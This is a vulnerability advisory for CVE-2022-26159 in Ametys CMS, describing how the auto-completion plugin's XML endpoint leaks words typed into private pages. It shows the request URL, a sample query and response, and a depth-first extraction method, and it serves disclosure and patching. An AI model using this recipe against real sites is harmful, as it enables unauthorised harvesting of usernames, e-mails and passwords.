CVE-2022-26159 - Ametys CMS - Unauthenticated information disclosure

  • Title : Ametys CMS - Unauthenticated information disclosure in the auto-completion plugin
  • Author : @podalirius_
  • CVSS : 5.3 (Medium)
  • CVSS Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary

The auto-completion plugin in Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages), which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.

Affected products

Product Software version
Ametys <= 4.5.0

Exploitation

The autocompletion plugin in Ametys CMS <= 4.5.0 exposes publicly an XML file containing a wordlist at the following address:

https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml

To perform a request on this database, an attacker just needs to type the start of the word in the q (query) parameter:

https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm

And the auto-completion plugin returns the first 10 matching words starting with adm (from the query) in an XML file:

<?xml version="1.0" encoding="UTF-8"?>
<auto-completion>
    <item>administrateur</item>
    <item>administrateurs</item>
    <item>administratif</item>
    <item>administratifs</item>
    <item>administration</item>
    <item>administrations</item>
    <item>administrative</item>
    <item>administratives</item>
    <item>administres</item>
    <item>admission</item>
</auto-completion>

With this in mind, an attacker just needs to perform a depth first search on the API to extract all the content of it.

Mitigations

In order to patch this vulnerability you need to update your Ametys CMS to the latest version (>= 4.5.0).